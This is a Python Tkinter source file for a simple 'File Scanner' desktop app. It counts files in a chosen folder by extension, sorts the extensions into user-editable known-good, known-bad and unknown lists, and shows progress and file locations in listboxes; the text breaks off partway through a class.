-TkinterWrapper.WindowListbox\r\n -ComputerDirectory() -void -object\r\n -SavedInfo() -void -object\r\n===================================================================================\r\nStill to do:\r\n -bind left click event with filetype listboxes. Options are to add to file type list\r\n\"\"\"\r\n\r\nimport os\r\nimport time\r\nfrom functools import partial\r\nimport UserErrorMessage\r\nimport TkinterWrapper\r\nimport FileWrapper\r\n\r\nALAPHABET=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nUP_TRIANGLE=\"{0}\".format('\\u25B2')\r\nDOWN_TRIANGLE=\"{0}\".format('\\u25BC')\r\nLEFT_TRIANGLE=\"{0}\".format('\\u25C0')\r\nRIGHT_TRIANGLE=\"{0}\".format('\\u25B6')\r\nSMALL_RIGHT_TRIANGLE=\"{0}\".format('\\u25B8')\r\n\r\n#SPLIT UP! 
Make information frame a class and call update methods on it\r\nclass AppWindow(object):\r\n def __init__(self):\r\n self.app_window=TkinterWrapper.Window(\"File Scanner\")\r\n self.update_scan_flags(False,False,False)\r\n self.__setup_window()\r\n self.__setup_menu()\r\n self.__setup_frames()\r\n self.update_frames()\r\n self.app_window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.app_window.remove_min_max_buttons(False)\r\n self.app_window.resizable(False,False)\r\n\r\n def __setup_menu(self):\r\n self.menu=TkinterWrapper.WindowMenu(self.app_window.get_window())\r\n self.file_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.file_cascade.add_item_to_cascade(\"Quit\",self.app_window.destroy_window)\r\n self.edit_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.edit_cascade.add_item_to_cascade(\"Known-Good Filetypes\",partial(self.add_known_file_type,\"KnownGood\"))\r\n self.edit_cascade.add_item_to_cascade(\"Known-Bad Filetypes\",partial(self.add_known_file_type,\"KnownBad\"))\r\n self.menu.add_cascade_to_menu(\"File\",self.file_cascade.get_cascade())\r\n self.menu.add_cascade_to_menu(\"Edit\",self.edit_cascade.get_cascade())\r\n\r\n def __setup_frames(self):\r\n self.process_information_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.found_files_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.current_file_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n for item in [[self.process_information_frame,\"top\"],[self.current_file_frame,\"top\"],[self.found_files_frame,\"top\"]]:\r\n item[0].pack_frame(item[1],0,0)\r\n self.file_information_frame=FileInfo(self.found_files_frame.get_frame())\r\n self.current_file_information_frame=CurrentFileInfo(self.current_file_frame)\r\n\r\n def update_frames(self):\r\n self.process_information_frame.destroy_all_child_widgets()\r\n self.update_process_information_frame()\r\n self.file_information_frame.update_frame(self.directory_set,self.process_running,self.scan_finished)\r\n self.current_file_information_frame.update_frame(self.process_running)\r\n\r\n def update_process_information_frame(self):\r\n if self.process_running==False and self.directory_set==False and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Please select a folder to scan.\",\"Set Search Folder\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==False and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Set to scan: {0}\".format(saved_information.get_directory_to_scan()),\"Scan\",self.commence_scan)\r\n self.add_button_to_process_information_frame(\"Change Folder To Scan\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==True and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_task()\r\n elif self.process_running==False and self.directory_set==False and self.scan_finished==True:\r\n self.update_process_information_frame_for_idle(\"Scan Completed\",\"Scan Something Else\",self.open_dir_selection_dialogbox)\r\n\r\n def update_process_information_frame_for_idle(self,top_text,button_text,button_action):\r\n label=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"{0}\".format(top_text))\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,0)\r\n 
self.add_button_to_process_information_frame(button_text,button_action)\r\n def add_button_to_process_information_frame(self,button_text,button_action):\r\n button=TkinterWrapper.WindowButton(self.process_information_frame.get_frame(),\"{0}\".format(button_text),button_action)\r\n button.pack_button(\"top\",0,1)\r\n\r\n def update_process_information_frame_for_task(self):\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning....\")\r\n top_text.configure_colors(\"grey20\",\"grey95\",\"times 14\")\r\n top_text.pack_label(\"top\",0,0)\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning: {0}\".format(saved_information.get_directory_to_scan()))\r\n top_text.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n top_text.pack_label(\"top\",0,0)\r\n self.progress_bar=Progressbar(self.process_information_frame.get_frame(),400,30)\r\n\r\n def add_known_file_type(self,type_consensus):\r\n dialog_box=FileTypeEditor(self.app_window.get_window(),type_consensus)\r\n\r\n def open_dir_selection_dialogbox(self):\r\n directory_selection=SetDirWindow(self.app_window.get_window())\r\n if directory_selection.get_saved_directory!=\"\":\r\n saved_information.set_directory_to_scan(directory_selection.get_saved_directory())\r\n self.update_scan_flags(True,False,False)\r\n self.update_frames()\r\n\r\n def commence_scan(self):\r\n self.update_scan_flags(True,True,False)\r\n self.update_frames()\r\n scan_gui=ScanGUI(self.file_information_frame.get_listboxes(),self.progress_bar,self.current_file_information_frame)\r\n self.scan=Scan(saved_information.get_directory_to_scan(),scan_gui)\r\n self.scan.start()\r\n scan_gui.start_checking_for_selection()\r\n self.update_scan_flags(False,False,True)\r\n self.update_frames()\r\n\r\n def update_scan_flags(self,directory_set_flag,process_running_flag,scan_finished_flag):\r\n self.process_running=process_running_flag\r\n self.directory_set=directory_set_flag\r\n self.scan_finished=scan_finished_flag\r\n\r\n\r\nclass FileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_file_types_frames()\r\n\r\n def __setup_file_types_frames(self):\r\n self.ok_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.bad_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.unknown_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n for frame in [[self.ok_files_frame,\"left\"],[self.bad_files_frame,\"left\"],[self.unknown_files_frame,\"left\"]]:\r\n frame[0].pack_frame(frame[1],0,0)\r\n\r\n def update_frame(self,directory_set,process_running,scan_finished):\r\n self.destroy_all_widgets(scan_finished)\r\n if (process_running==False or directory_set==False) and scan_finished!=True:\r\n for item in [[self.ok_files_frame,\"Ok\"],[self.bad_files_frame,\"Potentialy Harmfull\"],[self.unknown_files_frame,\"Unknown\"]]:\r\n item[0].configure_border(\"ridge\",2)\r\n self.insert_file_explaning_note(item[0],item[1])\r\n elif process_running==True and directory_set==True:\r\n self.listboxes=[]\r\n self.update_file_frame_for_task(self.ok_files_frame.get_frame(),\"Ok\")\r\n self.update_file_frame_for_task(self.bad_files_frame.get_frame(),\"Potentialy Harmfull\")\r\n self.update_file_frame_for_task(self.unknown_files_frame.get_frame(),\"Unknown\")\r\n\r\n def destroy_all_widgets(self,scan_finished):\r\n if scan_finished!=True:\r\n for frame in [self.ok_files_frame,self.bad_files_frame,self.unknown_files_frame]:\r\n frame.destroy_all_child_widgets()\r\n\r\n def 
insert_file_explaning_note(self,frame,text):\r\n information_label=TkinterWrapper.WindowLabel(frame.get_frame(),\"{0} files will be\\nshown here after a scan\".format(text))\r\n information_label.configure_colors(\"grey50\",\"grey95\",\"times 10\")\r\n information_label.pack_label(\"top\",0,2)\r\n\r\n def update_file_frame_for_task(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,\"{0} Files:\".format(text))\r\n label.configure_colors(\"grey60\",\"grey95\",\"times 12\")\r\n label.pack_label(\"top\",0,0)\r\n self.setup_textbox_frame(frame)\r\n self.setup_textbox_x_scrollbar_frame(frame)\r\n\r\n def setup_textbox_frame(self,file_frame):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n listbox=TkinterWrapper.WindowListbox(frame.get_frame())\r\n listbox.pack_listbox(\"left\",0,0)\r\n listbox.configure_size(40,30)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"y\")\r\n scrollbar.attach_to_widget(listbox.get_listbox())\r\n listbox.attach_scrollbar(\"y\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"left\",0,0)\r\n self.listboxes.append(listbox)\r\n\r\n def setup_textbox_x_scrollbar_frame(self,file_frame,):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"x\")\r\n scrollbar.attach_to_widget(self.listboxes[len(self.listboxes)-1].get_listbox())\r\n self.listboxes[len(self.listboxes)-1].attach_scrollbar(\"x\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"top\",0,0) \r\n\r\n def get_listboxes(self):\r\n return self.listboxes\r\n\r\n\r\nclass CurrentFileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_dummy_frame()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def __setup_dummy_frame(self):\r\n dummy_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n dummy_frame.pack_frame(\"top\",0,0)\r\n\r\n def setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n for frame,position in [[self.top_frame,\"top\"],[self.bottom_frame,\"top\"]]:\r\n frame.pack_frame(position,0,0)\r\n\r\n def make_labels(self):\r\n self.file_fraction=TkinterWrapper.WindowLabel(self.top_frame.get_frame(),\"\")\r\n self.file_fraction.configure_colors(\"grey40\",\"grey95\",\"times 11\")\r\n self.current_file=TkinterWrapper.WindowLabel(self.bottom_frame.get_frame(),\"Current File:\")\r\n self.current_file.configure_colors(\"grey40\",\"grey95\",\"times 10\")\r\n self.file_entry=TkinterWrapper.WindowEntry(self.bottom_frame.get_frame())\r\n self.file_entry.configure_size(115)\r\n\r\n def update_frame(self,process_running):\r\n if process_running==True:\r\n self.file_fraction.pack_label(\"top\",0,0)\r\n self.current_file.pack_label(\"left\",0,0)\r\n self.file_entry.pack_entry(\"left\",0,0)\r\n else:\r\n self.top_frame.destroy()\r\n self.bottom_frame.destroy()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def update_file_fraction(self,numerator,denominator):\r\n self.file_fraction.configure_text(\"{0} out of {1} files scanned\".format(numerator,denominator))\r\n def update_current_file(self,current_file_directory):\r\n self.file_entry.configure_entry_text(\"{0}\".format(current_file_directory))\r\n\r\n\r\nclass ScanGUI(object):\r\n def __init__(self,file_listboxes,progress_bar,current_info):\r\n self.file_listboxes=file_listboxes\r\n self.progress_bar=progress_bar\r\n 
self.current_file_information=current_info\r\n self.selections=[[\"\",\"\"],[\"\",\"\"],[\"\",\"\"]]\r\n self.listbox_being_used=[False,False,False]\r\n\r\n def update_file_lists(self,files):\r\n self.file_list=files\r\n self.check_for_selection()\r\n for x in range(0,3):\r\n if self.listbox_being_used[x]==False:\r\n self.file_listboxes[x].delete_text(0,\"end\")\r\n for file in files:\r\n if (file.get_file_consensus()==\"KnownGood\" and self.listbox_being_used[0]==False) or\\\r\n (file.get_file_consensus()==\"KnownBad\" and self.listbox_being_used[1]==False) or\\\r\n (file.get_file_consensus()==\"Unknown\" and self.listbox_being_used[2]==False):\r\n self.add_item_to_listbox(file.get_file_consensus(),file.get_file_extension(),file.get_number_of_files())\r\n\r\n def add_item_to_listbox(self,item_consensus,item_name,number_of_item):\r\n if item_consensus==\"KnownGood\":\r\n self.file_listboxes[0].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"KnownBad\":\r\n self.file_listboxes[1].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"Unknown\":\r\n self.file_listboxes[2].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n\r\n def update_progress_bar(self,percentage,part,total_parts):\r\n self.progress_bar.update(percentage,part,total_parts)\r\n\r\n def update_current_information(self,numerator,denominator,current_file_directory):\r\n self.current_file_information.update_file_fraction(numerator,denominator)\r\n self.current_file_information.update_current_file(current_file_directory)\r\n\r\n def start_checking_for_selection(self):\r\n self.check_for_selection()\r\n #This is not a good solution, better way to check every 250ms?\r\n self.file_listboxes[0].get_listbox().after(250,self.start_checking_for_selection)\r\n\r\n def check_for_selection(self):\r\n for x in range(0,3):\r\n self.selections[x][0]=self.file_listboxes[x].get_current_selection()\r\n self.selections[x][0]=self.file_listboxes[x].get_text_from_index(self.selections[x][0])\r\n for x in range(0,3):\r\n if self.selections[x][0]!=self.selections[x][1] and self.selections[x][0]!=None:\r\n print(\"Selection in listbox {0} has changed to: {1}\".format(x,self.selections[x][0]))\r\n self.selection_actions(x)\r\n self.selections[x][1]=self.selections[x][0]\r\n\r\n def selection_actions(self,listbox):\r\n if RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.show_file_type_places(self.selections[listbox][0],listbox)\r\n elif LEFT_TRIANGLE in self.selections[listbox][0]:\r\n self.go_back_to_file_type_list(listbox)\r\n elif SMALL_RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.open_file_explorer(self.selections[listbox][0])\r\n\r\n def show_file_type_places(self,selection,listbox):\r\n self.listbox_being_used[listbox]=True\r\n print(\"Selection: \"+selection)\r\n for file in self.file_list:\r\n if file.get_file_extension()==self.get_file_extension_from_selection(selection):\r\n self.insert_file_places(file,listbox)\r\n\r\n def get_file_extension_from_selection(self,selection):\r\n file_extension=\"\"\r\n for x in range(2,len(selection)):\r\n if selection[x]!=\" \" and selection[x]!=\"(\" and selection[x]!=\")\":\r\n file_extension+=selection[x]\r\n else:\r\n return file_extension\r\n\r\n def insert_file_places(self,file_type,listbox):\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n 
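start_checking_for_selection above re-arms itself with the widget's after() method, which is the standard tkinter idiom for periodic polling without blocking the mainloop (the record itself notes it is looking for a better way to run every 250 ms). A self-contained sketch of the same pattern:

import tkinter as tk

root = tk.Tk()
listbox = tk.Listbox(root)
listbox.insert("end", "alpha", "beta", "gamma")
listbox.pack()

def poll_selection():
    sel = listbox.curselection()
    if sel:
        print(listbox.get(sel[0]))
    root.after(250, poll_selection)  # re-arm: runs again in 250 ms

poll_selection()
root.mainloop()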
self.add_directional_information(listbox)\r\n for item in file_type.get_file_type_locations():\r\n self.file_listboxes[listbox].insert_text(\"{0} {1}\\n\".format(SMALL_RIGHT_TRIANGLE,item),\"end\")\r\n\r\n def add_directional_information(self,listbox):\r\n self.file_listboxes[listbox].insert_text(\"{0} Back to File List\\n\".format(LEFT_TRIANGLE),\"end\")\r\n self.file_listboxes[listbox].insert_text(\"{0} {1} Files\\n\".format(DOWN_TRIANGLE,self.get_file_extension_from_selection\\\r\n (self.selections[listbox][0])),\"end\")\r\n\r\n def go_back_to_file_type_list(self,listbox):\r\n self.listbox_being_used[listbox]=False\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n for file in self.file_list:\r\n if file.get_file_consensus()==\"KnownGood\" and listbox==0:\r\n self.add_item_to_listbox(\"KnownGood\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"KnownBad\" and listbox==1:\r\n self.add_item_to_listbox(\"KnownBad\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"Unknown\" and listbox==2:\r\n self.add_item_to_listbox(\"Unknown\",file.get_file_extension(),file.get_number_of_files())\r\n\r\n def open_file_explorer(self,file_location):\r\n file_location=file_location[2:len(file_location):1]\r\n for x in range(len(file_location)-1,0,-1):\r\n if file_location[x]==\"\\\\\":\r\n file_location=file_location[0:x:1]\r\n break\r\n os.startfile(r\"{0}\".format(file_location))\r\n\r\n\r\nclass Progressbar(TkinterWrapper.WindowCanvas):\r\n def __init__(self,frame,length,height):\r\n self.length=length\r\n self.height=height\r\n self.percentage=0\r\n self.rectangle_point=0\r\n super(Progressbar, self).__init__(frame,self.length,height)\r\n super(Progressbar, self).pack_canvas(\"top\",0,0)\r\n\r\n def update(self,percentage,part,total_parts):\r\n self.percentage=percentage\r\n super(Progressbar, self).delete_all_contents()\r\n self.update_part(part,total_parts)\r\n self.update_rectangle()\r\n self.update_text()\r\n self.canvas.update()\r\n\r\n def update_part(self,part,total_parts):\r\n super(Progressbar, self).add_text(self.length/2,6,\"Part {0} of {1}\".format(part,total_parts),\"grey10\",\"times 9\")\r\n\r\n def update_rectangle(self):\r\n super(Progressbar, self).add_rectangle(2,13,self.length,self.height,\"lightblue\")\r\n if self.percentage==\"GoThrough\":\r\n self.calculate_go_through_rectangle()\r\n super(Progressbar, self).add_rectangle(self.rectangle_point,13,self.rectangle_point+100,self.height,\"cornflowerblue\")\r\n else:\r\n self.rectangle_point=self.length*self.percentage\r\n super(Progressbar, self).add_rectangle(2,13,self.rectangle_point,self.height,\"cornflowerblue\")\r\n\r\n def calculate_go_through_rectangle(self):\r\n if self.rectangle_point>=self.length:\r\n self.rectangle_point=0\r\n else:\r\n self.rectangle_point+=0.05\r\n \r\n def update_text(self):\r\n if type(self.percentage).__name__!='str':\r\n if self.percentage<=0.95:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey10\",\"times 14\")\r\n else:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey80\",\"times 14\")\r\n\r\n \r\nclass Scan(object):\r\n def __init__(self,directory,scan_gui):\r\n self.scan_directory=directory\r\n self.scan_gui=scan_gui\r\n self.set_scan_variables()\r\n self.known_good_filetypes=saved_information.get_known_good_filetypes()\r\n self.known_bad_filetypes=saved_information.get_known_bad_filetypes()\r\n 
\r\n def set_scan_variables(self):\r\n self.current_directory=\"\"\r\n self.scanned_files=0\r\n self.file_extensions=[]\r\n self.file_type_object_list=[]\r\n \r\n def start(self):\r\n self.set_scan_variables()\r\n self.set_number_of_files()\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n for name in files:\r\n self.current_directory=\"{0}\\\\{1}\".format(root,name)\r\n self.scan_file(root,name)\r\n self.update_scan_gui(2)\r\n\r\n def set_number_of_files(self):\r\n print(self.scan_directory)\r\n self.number_of_files=0\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n self.number_of_files+=len(files)\r\n self.update_scan_gui(1)\r\n print(\"Number of files: {0}\".format(self.number_of_files))\r\n\r\n def scan_file(self,root,file):\r\n file_name,file_extension=os.path.splitext(\"{0}\".format(file))\r\n self.append_file_type(file_extension)\r\n self.update_file_type_object_list(root,file_extension,file_name)\r\n self.scanned_files+=1\r\n\r\n def append_file_type(self,file_extension):\r\n if file_extension not in self.file_extensions:\r\n self.file_extensions.append(file_extension)\r\n\r\n def update_file_type_object_list(self,file_path,file_extension,file_name):\r\n for item in self.file_type_object_list:\r\n if item.get_file_extension()==file_extension:\r\n item.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n break\r\n else:\r\n self.check_file_type_and_add_to_list(file_path,file_extension,file_name)\r\n\r\n def check_file_type_and_add_to_list(self,file_path,file_extension,file_name):\r\n if file_extension in self.known_good_filetypes:\r\n initializer=\"KnownGood\"\r\n elif file_extension in self.known_bad_filetypes:\r\n initializer=\"KnownBad\"\r\n else:\r\n initializer=\"Unknown\"\r\n new_file_type=FileType(file_extension,initializer)\r\n new_file_type.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n self.file_type_object_list.append(new_file_type)\r\n\r\n def update_scan_gui(self,part):\r\n if part==1:\r\n percent=\"GoThrough\"\r\n elif part==2:\r\n percent=self.scanned_files/self.number_of_files\r\n self.scan_gui.update_current_information(self.scanned_files,self.number_of_files,self.current_directory)\r\n self.scan_gui.update_progress_bar(percent,part,2)\r\n self.scan_gui.update_file_lists(self.file_type_object_list)\r\n\r\n\r\nclass FileType(object):\r\n def __init__(self,file_extension,file_consensus):\r\n self.file_extension=file_extension\r\n self.file_consensus=file_consensus\r\n self.file_type_locations=[]\r\n\r\n def get_file_extension(self):\r\n return self.file_extension\r\n def get_file_consensus(self):\r\n return self.file_consensus\r\n def get_number_of_files(self):\r\n return len(self.file_type_locations)\r\n def get_file_type_locations(self):\r\n return self.file_type_locations\r\n \r\n def add_file_to_list(self,file_path):\r\n self.file_type_locations.append(\"{0}{1}\".format(file_path,self.file_extension))\r\n\r\n def print_information(self):\r\n print(\"File extension: {0}\".format(self.file_extension))\r\n for item in self.file_type_locations:\r\n print(\" -> {0}\".format(item),end=\"\")\r\n print(\"\\t{0:7s} Consensus: {1}\".format(\"\",self.file_consensus))\r\n \r\n\r\nclass FileTypeEditor(object):\r\n def __init__(self,parent_window,edit_type):\r\n self.edit_type=edit_type\r\n self.set_file_type_list()\r\n self.window=TkinterWrapper.DialogBox(parent_window,\"Edit {0} File Types\".format(edit_type))\r\n self.__setup_window()\r\n self.__setup_frames()\r\n 
self.__setup_left_frame()\r\n self.__setup_right_frame()\r\n self.__setup_bottom_frame()\r\n self.update_listbox_text()\r\n\r\n def set_file_type_list(self):\r\n if self.edit_type==\"KnownGood\":\r\n self.file_type_list=saved_information.get_known_good_filetypes()\r\n elif self.edit_type==\"KnownBad\":\r\n self.file_type_list=saved_information.get_known_bad_filetypes()\r\n self.delete_list=[]\r\n self.append_list=[]\r\n \r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n self.window.bind_action(\"<Return>\",self.add_file_type)\r\n\r\n def __setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.left_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n self.right_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n for item in [[self.top_frame,\"top\"],[self.left_frame,\"left\"],[self.right_frame,\"right\"],\r\n [self.bottom_frame,\"bottom\"]]:\r\n item[0].pack_frame(item[1],1,0)\r\n self.left_frame.configure_border(\"ridge\",2)\r\n\r\n def __setup_right_frame(self):\r\n self.file_type_listbox=TkinterWrapper.WindowListbox(self.right_frame.get_frame())\r\n self.file_type_listbox.configure_size(20,10)\r\n self.file_type_listbox.pack_listbox(\"left\",0,0)\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.right_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(self.file_type_listbox.get_listbox())\r\n self.file_type_listbox.attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_left_frame(self):\r\n self.insert_explanatory_label(self.left_frame.get_frame(),\"Enter File Extension to Add:\")\r\n self.__setup_entry_frame()\r\n self.insert_explanatory_label(self.left_frame.get_frame(),\"Select a File Extension to Delete\")\r\n self.insert_button(self.left_frame.get_frame(),\"Delete\",self.delete_file_type,\"top\")\r\n self.error_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n self.error_frame.pack_frame(\"top\",0,0)\r\n \r\n def __setup_entry_frame(self):\r\n entry_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n entry_frame.pack_frame(\"top\",0,0)\r\n self.file_type_entry=TkinterWrapper.WindowEntry(entry_frame.get_frame())\r\n self.file_type_entry.configure_size(20)\r\n self.file_type_entry.pack_entry(\"left\",0,2)\r\n self.insert_button(entry_frame.get_frame(),\"Add\",self.add_file_type,\"left\")\r\n\r\n def __setup_bottom_frame(self):\r\n self.insert_button(self.bottom_frame.get_frame(),\"Cancel\",partial(self.window.destroy_window,False),\"left\")\r\n self.insert_button(self.bottom_frame.get_frame(),\"Save\",self.save_all_file_types_and_exit,\"left\")\r\n\r\n def insert_explanatory_label(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,text)\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,10)\r\n\r\n def insert_button(self,frame,button_text,button_action,side):\r\n button=TkinterWrapper.WindowButton(frame,button_text,button_action)\r\n button.pack_button(side,2,2)\r\n\r\n def add_file_type(self,*args):\r\n new_file_type=self.file_type_entry.get_entry()\r\n if len(new_file_type)>0 and new_file_type[0]==\".\" and (new_file_type not in self.file_type_list):\r\n self.file_type_list.append(new_file_type)\r\n self.append_list.append(new_file_type)\r\n self.update_listbox_text()\r\n self.file_type_entry.configure_entry_text(\"\")\r\n 
else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please enter a valid file type\")\r\n self.file_type_entry.select_range(0,\"end\")\r\n \r\n def delete_file_type(self):\r\n selection=self.file_type_listbox.get_current_selection()\r\n selection=self.file_type_listbox.get_text_from_index(selection)\r\n if selection is not None:\r\n for x in range(0,len(self.file_type_list)):\r\n if self.file_type_list[x]==selection:\r\n self.delete_list.append(self.file_type_list[x])\r\n del(self.file_type_list[x])\r\n break\r\n self.update_listbox_text()\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please select a file to delete\")\r\n \r\n def update_listbox_text(self):\r\n self.file_type_listbox.delete_text(0,\"end\")\r\n for item in self.file_type_list:\r\n self.file_type_listbox.insert_text(\"{0}\\n\".format(item),\"end\")\r\n\r\n def save_all_file_types_and_exit(self):\r\n for item in self.delete_list:\r\n saved_information.delete_file_type(self.edit_type,item)\r\n for item in self.append_list:\r\n saved_information.add_file_type(self.edit_type,item)\r\n self.window.destroy_window(False)\r\n\r\n \r\nclass SetDirWindow(object):\r\n def __init__(self,parent_window):\r\n self.window=TkinterWrapper.DialogBox(parent_window,\"Choose Folder\")\r\n self.directory_to_search=\"\"\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_information_frame()\r\n self.__setup_directory_frame()\r\n self.__setup_button_frame()\r\n self.window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n\r\n def __setup_frames(self):\r\n self.information_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.directory_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.button_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.information_frame.pack_frame(\"top\",0,0)\r\n self.directory_frame.pack_frame(\"top\",0,0)\r\n self.button_frame.pack_frame(\"top\",0,0)\r\n\r\n def __setup_information_frame(self):\r\n description_label=TkinterWrapper.WindowLabel(self.information_frame.get_frame(),\"\")\r\n description_label.configure_text(\"Please choose a folder to search from the list below:\")\r\n description_label.configure_colors(\"grey20\",\"grey95\",\"times 11\")\r\n description_label.pack_label(\"top\",0,5)\r\n\r\n def __setup_directory_frame(self):\r\n self.__setup_directory_entry_frame()\r\n self.__setup_directory_listbox_frame()\r\n\r\n def __setup_directory_entry_frame(self):\r\n directory_entry_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_entry_frame.pack_frame(\"top\",0,0)\r\n current_directory_label=TkinterWrapper.WindowLabel(directory_entry_frame.get_frame(),\"Current Directory:\\n\")\r\n current_directory_label.pack_label(\"left\",0,0)\r\n current_directory_label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n self.current_directory_entry=TkinterWrapper.WindowEntry(directory_entry_frame.get_frame())\r\n self.current_directory_entry.configure_size(65)\r\n self.current_directory_entry.pack_entry(\"top\",0,0)\r\n x_scrollbar=TkinterWrapper.WindowScrollbar(directory_entry_frame.get_frame(),\"x\")\r\n x_scrollbar.attach_to_widget(self.current_directory_entry.get_entry_widget())\r\n self.current_directory_entry.attach_scrollbar(x_scrollbar.get_scrollbar())\r\n x_scrollbar.pack_scrollbar(\"bottom\",0,0)\r\n\r\n def __setup_directory_listbox_frame(self):\r\n 
directory_listbox_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_listbox_frame.pack_frame(\"top\",0,0)\r\n self.dir_listbox=DirectoryListbox(directory_listbox_frame.get_frame(),self.current_directory_entry)\r\n\r\n def __setup_button_frame(self):\r\n self.search_button=TkinterWrapper.WindowButton(self.button_frame.get_frame(),\"Scan\",self.set_directory_and_destroy_window)\r\n self.search_button.pack_button(\"top\",0,0)\r\n\r\n def set_directory_and_destroy_window(self):\r\n self.directory_to_search=self.current_directory_entry.get_entry()\r\n print(\"Directory to scan: \"+self.directory_to_search)\r\n self.window.destroy_window(True)\r\n def get_saved_directory(self):\r\n return self.directory_to_search\r\n \r\n\r\n#Might have to split up into two classes: DirectoryListboxFormating and DirectoryListboxActions\r\nclass DirectoryListbox(TkinterWrapper.WindowListbox):\r\n def __init__(self,frame,companion_text_entry):\r\n self.frame=frame\r\n self.selections=[\"\",\"\"]\r\n self.current_directory_entry=companion_text_entry\r\n self.computer_directory=ComputerDirectory()\r\n self.__setup_listbox_frame()\r\n self.__setup_error_frame()\r\n self.insert_harddrives()\r\n self.start_checking_for_selection()\r\n\r\n def __setup_listbox_frame(self):\r\n self.listbox_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.listbox_frame.pack_frame(\"top\",0,0)\r\n super(DirectoryListbox, self).__init__(self.listbox_frame.get_frame())\r\n super(DirectoryListbox, self).pack_listbox(\"left\",0,0)\r\n super(DirectoryListbox, self).configure_size(80,10)\r\n self.__setup_scrollbar()\r\n def __setup_scrollbar(self):\r\n 